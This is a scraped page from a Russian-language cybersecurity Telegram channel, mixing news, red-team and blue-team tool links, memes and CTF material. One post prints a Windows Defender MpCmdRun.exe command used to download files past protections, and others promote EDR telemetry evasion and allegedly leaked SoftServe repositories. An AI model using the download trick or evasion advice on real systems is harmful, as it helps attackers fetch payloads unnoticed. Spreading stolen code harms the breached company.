🇺🇦x_Notes🇺🇦 🔜 – Telegram
🇺🇦x_Notes🇺🇦 🔜
1.79K subscribers
426 photos
41 videos
14 files
373 links
Cybersecurity Notes
Download Telegram
🔴🔴
🐦 Исследователь опубликовал в Твитере новый трюк как обойти защиту #windows при скачивании файлов.
🤔 Метод заключается в том чтобы скачать файл при помощи консольной версии “Microsoft Malware Protection” это успех!
Код позволяющий скачивать файлы: C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe -url <url> -path <local-path>

#WindowsDefender #bypass #av #redteam #MalwareProtection

https://twitter.com/mohammadaskar2/status/1301263551638761477
​​😱 #Breakingnews тут на канале @freedomf0x опубликовали пачку файликов которые как утверждается имеют отношение в недавнему взлому компании #SoftServe в архивах содержатся #git репозитории с программным кодом
‼️ Достоверность информации не проверена на данный момент, но может у кого из вас есть время проверить.‼️

https://news.1rj.ru/str/freedomf0x/9467
https://news.1rj.ru/str/freedomf0x/9468
https://news.1rj.ru/str/freedomf0x/9469
https://news.1rj.ru/str/freedomf0x/9470
https://news.1rj.ru/str/freedomf0x/9471
https://news.1rj.ru/str/freedomf0x/9472
https://news.1rj.ru/str/freedomf0x/9473
https://news.1rj.ru/str/freedomf0x/9474
​​❗️UPD: Некоторые конфиг файлы прямо указывают на то что по крайней мере один репозиторий имеет отношение к компании #SoftServe
​​⚙️ Всем привет. С ботом который отвечает за постинг в канал возникли проблемы, поэтому новостей не было, буду наверстывать.
❗️Компания #Cisco выпустила обновления безопасности для своих продуктов, по ссылке информация о закрытых уязвимостях. Обновите свои продукты от этого вендора.

#news #patch #vulnerabilities

https://tools.cisco.com/security/center/publicationListing.x
🔥🔥🔥
Прекрасный материал о том как готовили задания для #CTFZone соревнований. Думаю будет полезным тем кто готовит CTF с упором на практические задания. @Betepo_Ok good job👍

#writeup #architecture #ctf

https://medium.com/@offzone.conf/ctfzone-paper-trust-area-backend-part-33526dff5a9c
👽 Тут на неком уважаемом форуме вышел мануал как собрать себе среду для решения заданий #flareon, это такие соревнования по #reverseengineering
😃 Парни видимо “очень старались” у них не было времени объяснять, поэтому output из google translate решили выдать за мануал
😎 Вторая ссылка ведёт на оригинальный репозиторий, с нормальным мануалом. Пользуйтесь проверенными источниками, и не потребляйте дешевые материалы созданные ради количества.

#lulz #friday #fun

codeby{.}net/threads/flare-vm-nastrojka-rabochego-okruzhenija-dlja-revers-inzhiniringa-i-analiza-vredonosnyx-programm.67909/

https://github.com/fireeye/flare-vm
🔴🔴
🔒 Если #antivirus или #edr не дает вам спокойно жить, и блокирует все ваши активности в рамках #redteam операций, если вы хотите узнать какое решение какие использует методы сбора телеметрии. То держите тулу которая поможет посмотреть какую телеметрию собирает то или инное решение, какие хуки оно устанавливает, в следствии чего вы сможете подготовиться так, чтобы ни один #blueteam не обнаружил ваших шаловливых действий.😉
👨‍✈️ Защищающая сторона, сорян вам это мало поможет.

#bypass #telemetry #hook

https://github.com/jthuraisamy/TelemetrySourcerer
⚙️🛠
@ControllerBot опять пал смертью храбрых, поэтому посты буду в ручном порядке, ну и парочку тестовых через другие сервисы. Пока буду выбирать сервис для ведения канала, будут проскакивать тестовые посты. Прощу прощения за временные неудобства.
🤒🤕
⚙️ По рекомендации от подписчика, перезжаю на @FleepBot, пару дней потестирую, возможно буду использовать его на постоянной основе.
🙂 Доброе утро понедельника.
🔐 если вам не хватает стандартных настроек безопасности при хранении файлов в облачных сервисах, то специально для вас сервис #ProtonMail презентовал новый сервис #ProtonDrive. Создатели анонсировали e2e шифрование и отлично проработанную архитектуру безопасности для хранения файлов.
🧐 Учитывая тенденцию утечек которая все никак не прекратится, мне кажется что подобные сервисы будут обретать популярность, поскольку люди хотят свои тайны держать в секрете. А у #ProtonDrive ещё и юрисдикция отличная. Интересно чем конкуренты будут атаковать рынок?

#cloudstorage #news #encryption

https://protonmail.com/blog/protondrive-security/
🔴🔴
🚨 Команда красный уходит в отрыв по количеству полезных для них постов на данном канале. Сегодня у нас очередная подборка из разряда #awesome чего-то там на #github
Внутри подборки собраны инструменты которые помогут похекать все что угодно, подборка отсортирована по стадиям атаки. Если вы в #redteaming то большую часть тулзов и так знаете, но возможно сможете найти что-то новое или полезное для себя.

#redteam #collection #tools

https://github.com/infosecn1nja/Red-Teaming-Toolkit
🤗 На канале #DC8044 опубликовали афигенную инфорграфику с информацией о том как подготовится к сдаче #OSCP при помощи различных сервисов.
👍 Афигенно полезным может оказаться то что там отмечены бесплатные сервисы, что достаточно актуально когда ты студент, и каждая копейка на вес золота (сам когда-то таким был, не студентом, но без денег).
🤜 Кроме того для каждого из сервисов отмечены имена лабораторных машин которые помогут в сдаче OSCP.

#certification #offensivesecurity #newbie

https://news.1rj.ru/str/DC8044_Info/794
🤔 Вечер мемасов объявляется открытым 🤣

#memes #sberbank #passwords

https://twitter.com/a_okshus/status/1302716911558504456
😅 Продолжаем веселье

#memes #alfabank #passwords
🔵🔵
🏄‍♂️ Листая ленту Твиттера обнаружил ссылку на репозиторий с правилами для #ElasticSecurity которые позволяют детектировать вторжения в инфраструктуру. Все правила разбиты по категориям, кроме правил также имеются #python скрипты для динамического детекта.

#blueteam #elasticsearch #threatdetection

https://github.com/elastic/detection-rules
🔵🔵
🤓 Утром обнаружил хорошую статью на тему создания плейбуков для #SOC, статя оказалась очень крутой, я аж зачитался.
🤝 В стате описаны все боли и беды которые пришлось пережить команде #Solar_JSOC. Очень годные советы от команды которая на деле столкнулась со всеми описанными проблемами.

#blueteam #playbook #incidentresponse

https://habr.com/ru/post/518096/
🤖 Если вы давно мечтаете научится находить зиродеи в бинарщине, и рубить на этом огромные кучи денег то советую вам ознакомится с данным репозиторием.
🎲 В Readme автор описывает процесс создания так называемого #1day (эксплойт на который уже есть патч), все шаги которые необходимо проделать для создания эксплойта:
▪️Patch Diffing
▪️PoC Building
▪️и остальные процессы.

👍 Очень советую всем интересующимся данной темой

#exploitdevelopment #patchdiffing #pocbuilding #binary

https://github.com/piotrflorczyk/cve-2019-1458_POC